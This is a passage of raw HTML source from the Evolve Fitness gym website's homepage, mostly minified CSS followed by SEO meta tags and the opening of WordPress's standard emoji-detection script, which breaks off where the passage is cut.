Sans',sans-serif;text-transform:uppercase;width:330px}.hb2{position:absolute;top:60%;right:150px;font-size:48px;color:#fff;font-family:'Open Sans',sans-serif;text-transform:uppercase}#sliderBtm{padding:15px 0;background:url(//evolvefitnessinc.com/wp/wp-content/themes/rws-evolve/images/bg_sliderBtm.png);background-size:cover;font-family:"Open Sans",sans-serif}#sliderBtm #buzz{display:inline-block;width:25%;margin-right:6%;vertical-align:top;font-weight:normal}#sliderBtm #buzz p{font-size:16px;color:#231f20;line-height:20px}#sliderBtm #buzz p.title{font-size:32px;text-transform:uppercase;line-height:35px}#sliderBtm #buzz p.subtitle{text-transform:uppercase;margin-bottom:10px}#sliderBtm #buzz p.sig{text-align:right;margin-bottom:0}#sliderBtm #buzz .lm{text-align:right;color:#fff;line-height:13px;font-size:13px}#sliderBtm #specialOffers{display:inline-block;max-width:68%;vertical-align:top;color:#fff}#sliderBtm #specialOffers p.title{font-size:32px;text-transform:uppercase;font-weight:100;line-height:35px;color:#fff}#sliderBtm .offer{display:inline-block;width:40%;vertical-align:top}#sliderBtm .firstOffer{margin-right:8%}#sliderBtm .offer p{font-size:21px;text-transform:uppercase;color:#fff}#sliderBtm #specialOffers .offer p.title{font-weight:600;font-size:21px;line-height:24px}#slider li.banner.now-framingham-10-per-month{background-position:right top}#slider{position:relative}.slider-controls{position:absolute;bottom:0;right:.75rem;text-align:right;z-index:2}.slider-dot{margin:1rem .25rem;display:inline-block;width:1rem;height:1rem;background:rgba(255,255,255,0.5);-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:2px 2px 8px rgba(0,0,0,0.5);box-shadow:2px 2px 8px rgba(0,0,0,0.5);font-size:0;-webkit-transition:background .5s ease;-moz-transition:background .5s ease;-ms-transition:background .5s ease;-o-transition:background .5s ease;transition:background .5s ease}.slider-dot:hover,.slider-dot.active{background:white}.slider-arrow{display:block;position:absolute;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);z-index:1;font-size:300px;font-weight:lighter;font-family:"Helvetica Neue";color:rgba(255,255,255,0.5);text-shadow:2px 2px 8px rgba(0,0,0,0.5);height:100px;line-height:50px;overflow:hidden;-webkit-transition:color .5s ease;-moz-transition:color .5s ease;-ms-transition:color .5s ease;-o-transition:color .5s ease;transition:color .5s ease}.slider-arrow:hover{color:white}.slider-arrow.slider-left{left:0}.slider-arrow.slider-right{right:0}.scrollDown{height:80px;background:url(//evolvefitnessinc.com/wp/wp-content/themes/rws-evolve/images/scrollDown.png);background-repeat:no-repeat;background-position:center}.divider{border-bottom:1px solid #c9cacc;margin:30px 0 0}section.noScroll{margin-top:60px}.sectionBanner{height:350px;position:relative;background-size:cover;background-position:top center}.sectionBanner .contentWrapper{height:100%}.sectionBanner .sectionCaption{position:absolute;left:115px;bottom:20px;font-size:48px;font-weight:400;text-transform:uppercase;color:#fff;max-width:660px;line-height:60px;text-shadow:0 0 10px rgba(0,0,0,.86)}.sectionContent{padding:0 115px}.sectionContent.noBanner{margin-top:-36px}.sectionContent.withBg{margin-top:0;padding-top:6px}@media(min-width:769px){.sectionBanner.classes .sectionCaption{left:auto;right:35px;text-align:right;font-size:42px}}.address .title{font-size:28px;text-transform:uppercase}.address .phone{font-size:40px;line-height:40px}p.desc{color:#00a4e4;font-size:22px}ul.plain{list-style:none;padding:0;margin:0}ul.plain li{margin:0;padding:0;color:#435363;font-size:17px}ul.plain li a:hover{color:#00a4e4}.classList li{overflow:hidden;line-height:20px}.classList .pass{float:right}.classList img{max-height:20px;width:auto;display:inline-block}.leftCol{width:50%;margin-right:20%;display:inline-block;vertical-align:top}.rightCol{width:28%;display:inline-block;vertical-align:top}.evPost.team-members .evPostImg{max-width:100px}.lm{font-size:10px}.subLink{display:inline-block;position:absolute;margin-top:-100px}.gbp{width:30px;display:block;float:right}.gbp img{width:auto;height:auto;max-width:100%}.mobileLinks a{margin:10px 20px;display:inline-block}.fram{margin-top:80px;margin-left:-70px;color:#fff;font-size:48px;line-height:normal}.fram1{font-size:1em;color:#fff;line-height:.9;margin:0}.fram2{font-size:3em;display:inline-block;vertical-align:bottom;color:#fff;line-height:.9;margin:0}.fram2 span{font-size:1.5em;font-weight:600}.fram3{font-size:.9em;display:inline-block;vertical-align:bottom;color:#fff;line-height:1;margin:0;margin-bottom:50px}.instaVid{display:inline-block;max-width:65%}.instaVid iframe{max-width:100%}.instaCopy{display:inline-block;vertical-align:top;max-width:30%;margin-left:4%}.instaCopy p{padding-bottom:20px;margin-bottom:20px;border-bottom:1px solid #d9d9d9}.secondary .theContent{margin:50px 0}.secondary.login .theContent{margin:0 0 50px}.secondary p{margin:0 0 10px;font-size:16px}.secondary .banner{height:290px;padding:30px 0;background-size:cover;background-position:top center}.secondary .banner h1{margin-top:180px;margin-bottom:10px;font-size:37px;color:#fff;font-weight:normal}.secondary .banner h2{margin-top:0;margin-bottom:0;font-size:19px;color:#00a4e4;font-weight:normal}.secondary .locations{margin:40px 0}.secondary .leftCol{width:60%;display:inline-block;vertical-align:top;margin:0}.secondary .rightCol{width:35%;margin-left:5%;display:inline-block;vertical-align:top}.secondary p.title{font-size:17px;color:#f89728;margin:20px 0 5px;text-transform:uppercase}.amenityList p{margin:0}.secondary .lm{text-align:right;color:#00a4e4;font-size:10px}.blog a{color:#f89728}.secondary a.lm:after{content:"\00BB"}.secondary a.btn{display:inline-block;width:26%;margin:0;margin-right:2%;padding:5px 3%}.secondary a.btn:last-child{margin-right:0}.secondary .bigTitle{font-size:37px;color:#f89728;text-transform:uppercase}.secondary .blog{border-bottom:1px solid #d7d8d9;padding-bottom:20px;margin-bottom:20px}.secondary .blog .lm{font-size:14px}.secondary h3{color:#f89728}.secondary h4{color:#00a4e4}.secondary.team-members h2{font-size:19px;color:#00a4e4;margin:0 0 10px}.secondary.team-members .title{margin:0 0 20px}.general.contentWrapper{padding:30px 0}.blog .contentWrapper{padding:30px 50px}.date{margin-bottom:30px}.secondary.trainers .team-members.inactive{display:inline-block;vertical-align:top;width:120px;-webkit-transition:all 500ms ease-out;-moz-transition:all 500ms ease-out;-o-transition:all 500ms ease-out;transition:all 500ms ease-out}.secondary.trainers .team-members.inactive .evPostContent{display:none}.secondary.trainers .team-members.active{width:460px;margin-right:20px;margin-bottom:20px}.secondary.trainers .team-members .evPostImg{position:relative}.secondary.trainers .team-members .evPostImg .fname{position:absolute;bottom:0;margin:0;padding:2px 5px;left:0;right:0;background-color:rgba(255,255,255,.7);color:#00a4e4;text-transform:uppercase}.secondary .teamFilters{margin-top:-10px;margin-bottom:20px}.teamFilters span{display:inline-block;margin-left:20px}.teamFilters a{color:#f89728}.teamFilters a.currentFilter{color:#00a4e4;text-decoration:underline}.secondary .btn.scroll-to{width:auto;margin-bottom:2%;white-space:nowrap}.left30{display:inline-block;width:30%;vertical-align:top}.right65{display:inline-block;width:65%;margin-left:2%}.special-offers img{margin:15px}.theClass .img{display:inline-block;max-width:40%}.theClass .copy{display:inline-block;vertical-align:top;max-width:50%;margin-left:4%}.theClass .copy h3{margin-top:0}.bc{color:#00a4e4;font-size:12px;margin-bottom:40px;text-transform:capitalize}.prev{float:left;color:inherit}.next{float:right;color:inherit}.next-prev{clear:both;color:#00a4e4;font-size:12px;margin:40px 0}.free-fitness-pass form,.metrowest form{max-width:700px;margin:30px 0}.free-fitness-pass .ninja-forms-form-wrap input,.free-fitness-pass .ninja-forms-form-wrap select,.free-fitness-pass .ninja-forms-form-wrap textarea{padding:0 10px;line-height:30px;height:30px}.free-fitness-pass .ninja-forms-form-wrap textarea{height:auto}.free-fitness-pass .ninja-forms-form .label-above label,.ninja-forms-form .label-below label{display:inline-block;width:150px}.free-fitness-pass .profile_pass-wrap input,.text-wrap.label-above input,.text-wrap.label-below input,.text-wrap.label-inside input,.textarea-wrap.label-above textarea,.textarea-wrap.label-below textarea,.textarea-wrap.label-inside textarea,.list-dropdown-wrap.label-above select,.list-dropdown-wrap.label-below select{max-width:500px;display:inline-block}.metrowest .ninja-forms-form-wrap input,.metrowest .ninja-forms-form-wrap select,.metrowest .ninja-forms-form-wrap textarea{padding:0 10px;line-height:30px;height:30px}.metrowest .ninja-forms-form-wrap textarea{height:auto}.metrowest .ninja-forms-form .label-above label,.ninja-forms-form .label-below label{display:inline-block;width:150px}.metrowest .profile_pass-wrap input,.text-wrap.label-above input,.text-wrap.label-below input,.text-wrap.label-inside input,.textarea-wrap.label-above textarea,.textarea-wrap.label-below textarea,.textarea-wrap.label-inside textarea,.list-dropdown-wrap.label-above select,.list-dropdown-wrap.label-below select{max-width:500px;display:inline-block}.groupX .contentWrapper{max-width:1200px;z-index:1}.groupX .banner{position:relative;border-top:6px solid #f89728}.groupX .banner:after{content:"";position:absolute;z-index:0;top:0;bottom:0;left:0;right:0;background:rgba(0,92,171,.65)}.groupX-banner-btm{margin-bottom:3rem}.groupX-banner-btm *{color:white}.groupX-banner-btm h2{margin-top:48px;margin-bottom:48px;color:white;font-size:2rem;font-weight:600;letter-spacing:.07rem}.groupX-banner-btm p{color:white;font-size:2rem;letter-spacing:.05rem;margin-top:-32px;margin-bottom:48px;text-transform:none;font-style:italic;line-height:1}.groupX-form{background:#f89728;color:white;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:1rem 1.5rem 1.5rem;position:absolute;right:1.5rem;top:0;z-index:10;width:100%;max-width:320px;-webkit-box-shadow:0 16px 32px rgba(0,0,0,0.34);box-shadow:0 16px 32px rgba(0,0,0,0.34)}.groupX-form h2{margin-top:0 !important;margin-bottom:.5rem !important;color:#005cab !important;font-size:1.75rem !important;font-weight:600 !important;text-align:center}.groupX.secondary .banner h1{padding-right:320px;margin-top:140px;font-size:3rem;font-weight:600;line-height:1;text-shadow:0 0 16px rgba(0,0,0,0.5),0 0 48px rgba(0,0,0,0.5);letter-spacing:.05rem}.groupX.secondary .banner h1 small{display:block;margin-bottom:.5rem;font-size:2rem;text-transform:none;color:#f89728}.groupX-form .evInput{display:block;outline:0;border:1px solid #cacaca;padding:.4rem .5rem;margin-bottom:.5rem;width:100%}.groupX-form .evInput:focus{border-color:#777}.groupX-form .btn{outline:0;border:2px solid white;margin-top:1rem;line-height:1;padding:.75rem;display:block;width:100%;font-size:1.15rem;text-transform:uppercase;letter-spacing:.05rem;background-color:transparent}.groupX-form legend{font-weight:bold}.groupX .evBreadcrumbs{margin-top:36px;color:#aaa;text-transform:uppercase;letter-spacing:.05rem;font-size:.75rem}.groupX .evBreadcrumbs a:hover{color:#00a4e4}.groupX-desc{padding-right:320px}.groupX-gridWrapper{display:table;clear:both;font-size:0;margin:0 -1rem;width:100%;width:-webkit-calc(100% + 2rem);width:-moz-calc(100% + 2rem);width:calc(100% + 2rem);table-layout:fixed;border-spacing:1rem .5rem}.groupX-grid{position:relative;display:table-cell;vertical-align:top;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;font-size:1rem;height:100%;border:1px solid #005cab}.groupX-grid-vid{position:relative;top:0;left:0;right:0;padding-top:66.66667%}.groupX-grid-vid:empty{display:none}.groupX-grid-vid iframe{position:absolute;top:0;left:0;right:0;width:100%;height:100%}.groupX-grid figcaption{text-align:center;font-size:.75rem;letter-spacing:.05rem;border-top:0;color:#777;padding:12px 12px 48px}.groupX-grid-title{margin-bottom:8px !important;display:block;text-transform:uppercase;font-size:1.25rem !important;font-weight:bold;line-height:1.33;color:#005cab}.groupX-grid:hover figcaption{border-color:rgba(119,119,119,0.61)}.groupX-grid-desc{text-align:left;font-size:.85rem !important;margin-bottom:0 !important;line-height:1.33;color:#005cab}.groupX-grid .btn{position:absolute;bottom:0;left:0;right:0;margin:0 !important;display:block !important;width:100% !important;color:white;background:#005cab;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;margin-bottom:0;font-size:1.15rem;font-weight:600;text-transform:uppercase;letter-spacing:.07rem;padding:0 6px !important;height:36px;line-height:36px}.groupX-grid-img{display:block;margin:0 auto 1rem;height:40px;width:auto}.groupX-disclaimer{margin-top:30px !important;font-size:.9em;font-weight:600;font-style:italic;text-align:center}.groupX-bg-section{background:#f89728;background:-moz-linear-gradient(45deg,#ef4129 0,#f89728 75%);background:-webkit-linear-gradient(45deg,#ef4129 0,#f89728 75%);background:linear-gradient(45deg,#ef4129 0,#f89728 75%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ef4129',endColorstr='#f89728',GradientType=1);padding:6rem 0;margin:5rem 0;text-align:center}.groupX-bg-section .subheading{color:white;font-size:5rem;line-height:1;letter-spacing:.05rem;margin-bottom:0;font-variant:small-caps;text-transform:lowercase;letter-spacing:.12rem}.groupX-bg-section .contentWrapper{max-width:1200px}.groupX-bg-section .btn{background:transparent;color:white;border:2px solid white;display:inline-block;text-transform:capitalize;letter-spacing:.05rem;width:auto;max-width:100%;margin:1rem .5rem;font-size:2rem}.groupX-bg-section .btn:hover{opacity:1;background:white;color:#f89728}.groupX-thumbnail{display:block;width:100%;max-width:300px;float:left;margin-right:16px;margin-bottom:16px}.groupX-banner-logo{display:block;margin:8px 0 0;height:63px;background:rgba(255,255,255,0.6);-webkit-border-radius:6px;-moz-border-radius:6px;border-radius:6px;padding:6px;-webkit-box-shadow:0 0 48px #222;-moz-box-shadow:0 0 48px #222;box-shadow:0 0 48px #222}.ef-row{text-align:center;margin-left:-16px;margin-right:-16px}.ef-col{display:inline-block;vertical-align:middle;padding:16px;-webkit-box-sizing:border-box;box-sizing:border-box;width:100%}.ef-col.align-top{vertical-align:top}.ef-col.five-wide{width:20%}.ef-col.four-wide{width:25%}.ef-col.three-wide{width:33.33333%}.ef-col.two-wide{width:50%}.aspect-container{width:100%;padding-top:56.25%;position:relative}.aspect-container.square{padding-top:100%}.aspect-content{position:absolute;top:0;left:0;bottom:0;right:0;width:100%;height:100%}.testimonial{display:inline-block;width:30%;margin:0 2% 30px;vertical-align:top}.testimonial:nth-child(3n+1){margin-left:0}.testimonial:nth-child(3n+3){margin-right:0}.testimonial .sig{color:#00a4e4;font-size:.9em;text-align:right}.testimonial .sig span{font-style:italic}#offerOverlay{opacity:0}.overlayBg{position:absolute;top:0;left:0;right:0;background-color:rgba(0,0,0,.8);text-align:center;z-index:99;display:none}.overlay{position:relative;text-align:left;display:inline-block;margin:0 auto}.controls{position:absolute;right:-24px;width:25px;border:1px solid #66a1ea;color:#66a1ea;top:10px;text-align:center;background-color:#fff;border-radius:50%;font-weight:bold}.controls:hover{cursor:pointer}.tabs{margin-left:0}.tab{display:inline-block;background-color:#fff;border-radius:5px 5px 0 0;padding:5px 10px;font-size:11px;vertical-align:bottom}.tab:hover{cursor:pointer}.tab.active{border:4px solid #66a1ea;border-bottom:0;font-size:13px}.offerContent{position:relative}.overlay .offer{display:none}.overlay .offer.active{display:block}#overlay .overlay{max-width:80%;margin:0 auto}#overlay .overlay.theVid{width:80%}#overlay .overlay iframe{width:100%;height:100%}#overlay .overlay .oc{background-color:#fff;border-radius:10px;border:2px solid #000;padding:30px;text-align:center}.metrowest .theContent{margin-top:20px}.metrowest h3{text-transform:uppercase;margin-top:15px}.hide-SEO{display:block !important;height:0 !important;width:0 !important;position:absolute !important;top:-99px;left:-99px;overflow:hidden;border:0 !important}.is-invalid-input:not(:focus){border-color:#c60f13;background-color:#f8e6e7}#home #slider li{position:relative}#home #slider li:after{content:"";position:absolute;top:0;left:0;bottom:0;right:0;background:rgba(44,62,80,0.45)}#home #slider li .contentWrapper{position:relative;z-index:1}@media(max-width:1300px){.hb1{top:auto;bottom:30px}.hb2{top:45%}}@media(min-width:1201px){#mobileNav{display:none}}@media(max-width:1200px){#mobileNav{display:block}#nav{position:absolute;left:0;width:100%;text-align:center;top:82px;background-color:#666;color:#fff;margin:0;padding:10px 0}#mobileNav{color:#fff}.dt{display:none}#logo{max-width:50%;display:inline-block;float:left}#navRight{position:absolute;width:100%;left:0}#nav.active div{display:block}#nav li{display:block;text-align:center;font-size:16px;color:#fff;margin:10px 0}#menu-main-nav li:last-child{color:#fff !important}#navRight{position:relative;text-align:right}section#home,.mainContent{padding-top:126px}.hb2{width:100%;text-align:center;left:0}footer li ul{display:none}#footBtm{margin:0}.fram{font-size:40px;margin-top:80px;margin-left:0}.fram2{font-size:2.5em}.fram3{margin-bottom:20px}}@media(min-width:769px){.mobile{display:none}}@media(max-width:768px){.slider-arrow{display:none}.slider-controls{right:.25rem}.slider-dot{margin:.5rem .25rem}section#home,.mainContent{padding-top:116px}.contentWrapper{padding:0 20px}.secondary .banner,.sectionBanner{height:170px}.secondary .banner{position:relative}.secondary .banner .contentWrapper{position:absolute;bottom:30px}.secondary .banner h1{position:relative;bottom:0;margin:0;font-size:28px;margin-bottom:10px}.right65{display:block;width:auto;margin:0}#slider li{height:250px;background-position:center}.hb2{width:80%;margin:0 10%;line-height:30px;font-size:30px;top:30%}.hb1{font-size:16px;line-height:16px;right:5%;width:90%;bottom:10px;left:auto}#offerOverlay .overlay{max-width:90%}#sliderBtm #specialOffers,#sliderBtm #buzz{display:block;width:auto;text-align:center;max-width:none}.sectionBanner .sectionCaption{font-size:30px;line-height:36px;left:10%;margin-bottom:0}h1{font-size:25px;line-height:28px}.col3{width:auto;display:block;margin-bottom:30px}.vidLink .vid{display:block;margin:30px auto}.evPost.team-members{margin-bottom:30px}.evPost.team-members .evPostImg{display:block;float:none;margin:10px auto}.evPost.team-members .evPostContent{display:block;float:none;width:auto;margin:10px auto}.evPost.evolve-media{width:Auto;display:block;margin:-15px auto 0;height:auto}.leftCol,.rightCol,.secondary .leftCol,.secondary .rightCol{width:auto;max-width:none;display:block;float:none;margin:0}.mobileLinks{text-align:center}.address .phone{font-size:30px}.address .title{font-size:20px}.secondary a.btn{display:block;width:auto;margin:10px 0;text-align:center}.project-details{margin-top:30px}.team-members .leftCol img{margin:20px 0}.theClass .img{width:auto;max-width:none;display:block;margin-bottom:20px}.theClass .copy{width:auto;max-width:none;display:block}.fram{font-size:30px;margin-top:40px}.instaVid{display:block;max-width:none;text-align:center}.instaCopy{display:block;max-width:none}.testimonial{display:block;margin:20px auto !important;max-width:none !important;width:auto}.groupX-gridWrapper{display:block;margin:0 auto;width:100%}.groupX-grid{display:block;max-width:480px;width:100%;margin:0 auto 1rem}.groupX .banner{height:auto}.groupX .banner .contentWrapper{position:relative;top:auto;bottom:auto;left:auto;right:auto;text-align:center}.groupX-form{position:relative;top:auto;bottom:auto;left:auto;right:auto;width:320px;max-width:100%;margin:0 auto}.groupX-desc{padding-right:0}.groupX-banner-logo{margin:8px auto 0}.groupX.secondary .banner h1{padding-right:0;margin-top:0}.groupX-bg-section .subheading{font-size:4rem}.ef-col.five-wide,.ef-col.four-wide,.ef-col.three-wide,.ef-col.two-wide{max-width:480px;margin:0 auto;width:100%}}@media(max-width:550px){#nav{top:72px}#navOffer{padding:20px 15px}#navOffer p{line-height:15px}.oh1{font-size:12px}.oh2{font-size:18px}#footlogo{float:none;margin:0 auto;display:block;text-align:center}.footerNav,#footBtm{margin:20px 0;text-align:center}#social{margin-bottom:20px}.fram3{display:none}}@media(max-width:480px){#sliderBtm .offer{width:auto;display:block}#sliderBtm .firstOffer{margin-right:0;margin-bottom:30px}.groupX-grid{width:100%;max-width:100%}.groupX-thumbnail{display:block;float:none;margin:0 auto 1rem !important}.groupX-bg-section .btn.pt-scroll-top{width:200px}}h2 span.orange{font-size:37px;font-weight:600;text-transform:uppercase;font-family:"Open Sans",sans-serif;color:#f89728;line-height:41px;margin-bottom:10px;text-transform:uppercase}h2.secondary{color:#00a4e4;font-size:20px;line-height:1.2;text-transform:uppercase}.unit{min-height:225px;font-size:0}img.yoga-img{float:none;display:inline-block;padding:0 15px 30px 0;box-sizing:border-box;width:20%;vertical-align:top}.yoga-class{float:none;display:inline-block;width:80%;box-sizing:border-box;vertical-align:top}.yoga-class h3{margin-top:0}@media(max-width:600px){img.yoga-img{float:none;display:block;margin:0 auto 15px;padding:0;width:auto}.yoga-class{width:100%}}.new-callout{padding:15px 0}.new-callout .title{color:#FFF;font-size:28px;padding-top:20px;text-align:center}.new-callout .sub-header{font-size:20px;margin-bottom:20px}.new-callout ul{margin:10px;list-style-type:none;padding:0}.new-callout ul li{font-size:18px;margin-bottom:10px;text-indent:-24px;margin-left:40px}.new-callout ul li:before{content:'\f00c';padding-right:10px;font-family:'fontawesome';font-weight:900}.new-callout .background{background:rgba(248,151,40,0.57);padding:15px 18px;margin:25px 15px 0}.new-callout p{text-align:center}.new-callout p,.new-callout ul{color:#FFF}.new-callout a{color:#005cab}.new-callout a:hover{color:#f89728;border-bottom:2px solid #f89728}.ev-amenity-wrapper,.ev-amenity-wrapper *{-webkit-box-sizing:border-box;box-sizing:border-box}.ev-amenity-wrapper{display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;flex-flow:row wrap;justify-content:center;align-items:stretch;margin-left:-2%;margin-right:-2%}.ev-amenity{margin:2%;padding:0;width:29.33333%;background:#f89728}.ev-amenity-img{display:block;width:100%}.ev-amenity-icon-wrapper{position:relative;z-index:1;display:block;padding:8px;margin:-45px auto;width:90px;height:90px;-webkit-border-radius:50%;border-radius:50%;background:#f89728}.ev-amenity-icon{display:block;width:100%;height:100%;padding:5px;border:5px solid white;-webkit-border-radius:50%;border-radius:50%}.ev-amenity-hdg{padding:56px 16px 12px;color:white;text-align:center;background:#f89728;font-weight:600;letter-spacing:.04rem}.ev-amenity:nth-child(9n+1),.ev-amenity:nth-child(9n+1) .ev-amenity-icon-wrapper,.ev-amenity:nth-child(9n+1) .ev-amenity-hdg,.ev-amenity:nth-child(9n+6),.ev-amenity:nth-child(9n+6) .ev-amenity-icon-wrapper,.ev-amenity:nth-child(9n+6) .ev-amenity-hdg,.ev-amenity:nth-child(9n+8),.ev-amenity:nth-child(9n+8) .ev-amenity-icon-wrapper,.ev-amenity:nth-child(9n+8) .ev-amenity-hdg{background:#f89728}.ev-amenity:nth-child(9n+2),.ev-amenity:nth-child(9n+2) .ev-amenity-icon-wrapper,.ev-amenity:nth-child(9n+2) .ev-amenity-hdg,.ev-amenity:nth-child(9n+4),.ev-amenity:nth-child(9n+4) .ev-amenity-icon-wrapper,.ev-amenity:nth-child(9n+4) .ev-amenity-hdg,.ev-amenity:nth-child(9n+9),.ev-amenity:nth-child(9n+9) .ev-amenity-icon-wrapper,.ev-amenity:nth-child(9n+9) .ev-amenity-hdg{background:#0b6fb9}.ev-amenity:nth-child(9n+3),.ev-amenity:nth-child(9n+3) .ev-amenity-icon-wrapper,.ev-amenity:nth-child(9n+3) .ev-amenity-hdg,.ev-amenity:nth-child(9n+5),.ev-amenity:nth-child(9n+5) .ev-amenity-icon-wrapper,.ev-amenity:nth-child(9n+5) .ev-amenity-hdg,.ev-amenity:nth-child(9n+7),.ev-amenity:nth-child(9n+7) .ev-amenity-icon-wrapper,.ev-amenity:nth-child(9n+7) .ev-amenity-hdg{background:#ef4127}.ev-amenity-vid{position:relative;margin-top:-3rem;margin-bottom:3rem;padding:16px 0 58px}.ev-amenity-vid:after{content:'';position:absolute;top:0;bottom:0;left:-100%;right:-100%;width:100vw;height:100%;margin:0 auto;background:url('/wp/wp-content/uploads/2019/01/amenities-vidBG-min.jpg');background-size:cover;background-position:center center;background-repeat:no-repeat}.ev-amenity-vid .ef-row{position:relative;z-index:1}.ev-amenity-vid h2,.ev-amenity-vid p{color:white}.ev-amenity-vid h2{text-transform:uppercase;font-weight:600;letter-spacing:.05rem;font-size:54px;text-align:left}.ev-amenity-vid p{text-align:left;font-size:48px;line-height:1.2;font-weight:lighter;font-family:Helvetica,Arial,sans-serif;margin-top:160px}.ev-amenity-iframe{position:relative}.ev-amenity-iframe-placeholder{position:absolute;top:0;bottom:0;left:0;right:0;background:url('/wp/wp-content/uploads/2019/01/amenities-iframe-min.jpg');background-size:cover;background-position:center center;background-repeat:no-repeat;cursor:pointer;border:1px solid rgba(255,255,255,0.75)}.ev-play-button-outer{position:absolute;top:0;bottom:0;left:0;right:0;background-color:rgba(0,0,0,.34);cursor:pointer;border:1px solid rgba(255,255,255,0.75);transition:.34s background ease}.ev-play-button{margin:0 auto;position:absolute;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);left:0;right:0;width:0;height:0;border-style:solid;border-width:2.5em 0 2.5em 5em;border-color:transparent transparent transparent #fff;opacity:.75;transition:.34s opacity ease}.ev-play-button-outer:hover{background-color:rgba(0,0,0,0)}.ev-play-button-outer:hover .ev-play-button{opacity:1}@media(max-width:768px){.ev-amenity{width:46%}.ev-amenity-vid h2{font-size:36px}.ev-amenity-vid p{font-size:30px;margin-top:16px}}@media(max-width:480px){.ev-amenity{width:96%}}img.alignleft{display:block;float:left;margin-right:16px;margin-bottom:16px}img.alignright{display:block;float:right;margin-left:16px;margin-bottom:16px}img.aligncenter{display:block;margin:16px auto}img.alignnone{display:block;margin:16px 0}#nav li{text-transform:none}#footBtm{margin-top:190px}.footerNav,#footBtm{margin-left:180px}@media only screen and (max-width:1368px){#menu-main-nav li{font-size:17px;margin-left:7px;margin-right:7px}}@media only screen and (max-width:1200px){#footBtm{margin-top:0}}@media only screen and (max-width:550px){.footerNav,#footBtm{margin-left:0}}.footerNav,.groupX .banner:after,#home #slider li:after{display:none}#footBtm{margin-top:0}@media only screen and (max-width:768px){.banner.evolve-yoga-studio .fram3{display:none}}#home #slider li.new-framingham-location:after{display:none}#slider li.new-framingham-location .fram{margin-top:70px}#slider li.new-framingham-location .head-shot{font-size:.55em;color:#f89728;font-weight:700;letter-spacing:.05rem;display:block}#slider li.new-framingham-location .blurb{font-size:.5em;width:525px}#slider li.new-framingham-location p{text-shadow:none}@media only screen and (max-width:1200px){#slider li.new-framingham-location img{width:372px !important}}@media only screen and (max-width:768px){#slider li.new-framingham-location .blurb{display:none}#slider li.new-framingham-location img{width:284px !important;margin:8px 0 12px !important}.fram3-hide-tablet{display:none}#slider li.new-framingham-location .fram{margin-top:30px}#slider li.new-framingham-location .fram2{font-size:1.75em !important}}#home #slider li.eburn360{background-size:contain;background-position:top center;background-repeat:no-repeat;background-color:#000}#home #slider li.eburn360:after{display:none}#home #slider li.eburn360 .btn{display:inline-block;line-height:40px;padding:10px 30px 6px}@media(min-width:769px){#home #slider li.eburn360 .btn{position:absolute;right:0;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%)}}@media(max-width:768px){#home #slider li.eburn360{background-size:auto 220px;background-position:top left}#home #slider li.eburn360 .btn{position:absolute;bottom:10px;left:16px;padding:13px 56px 9px;margin-left:20px}}@media only screen and (max-width:550px){.mobile-margin-top{margin-top:96px !important}}#slider li:last-of-type{background-position:top center}@media only screen and (max-width:550px){.mobile-margin-top{margin-top:64px !important}}</style><title>Best Gyms In Cambridge &amp; Framingham MA | Evolve Fitness</title> <link rel="pingback" href="https://evolvefitnessinc.com/wp/xmlrpc.php"> <!--[if lt IE 9]> <script src="https://evolvefitnessinc.com/wp/wp-content/themes/rws-evolve/js/html5.js"></script> <![endif]--> <!-- This site is optimized with the Yoast SEO plugin v4.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Evolve Fitness offers Les Mills Group Exercise Classes &amp; certified Personal Trainers in your Local gym. Sign up today for special membership offers!"/> <meta name="robots" content="noodp"/> <link rel="canonical" href="https://evolvefitnessinc.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Best Gyms In Cambridge &amp; Framingham MA | Evolve Fitness" /> <meta property="og:description" content="Evolve Fitness offers Les Mills Group Exercise Classes &amp; certified Personal Trainers in your Local gym. Sign up today for special membership offers!" /> <meta property="og:url" content="https://evolvefitnessinc.com/" /> <meta property="og:site_name" content="Evolve Fitness" /> <meta property="og:image" content="https://evolvefitnessinc.com/wp/wp-content/uploads/2015/07/533_EVL_CAM_POPUP_10-28.jpg" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Evolve Fitness offers Les Mills Group Exercise Classes &amp; certified Personal Trainers in your Local gym. Sign up today for special membership offers!" /> <meta name="twitter:title" content="Best Gyms In Cambridge &amp; Framingham MA | Evolve Fitness" /> <meta name="twitter:site" content="@evolvefit" /> <meta name="twitter:image" content="https://evolvefitnessinc.com/wp/wp-content/uploads/2015/07/533_EVL_CAM_POPUP_10-28.jpg" /> <meta name="twitter:creator" content="@evolvefit" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/evolvefitnessinc.com\/","name":"Gyms in Framingham and Cambridge - Evolve Fitness","potentialAction":{"@type":"SearchAction","target":"https:\/\/evolvefitnessinc.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <meta name="google-site-verification" content="UA-28084680-1" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//use.fontawesome.com' /> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/evolvefitnessinc.com\/wp\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.13"}}; !function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return 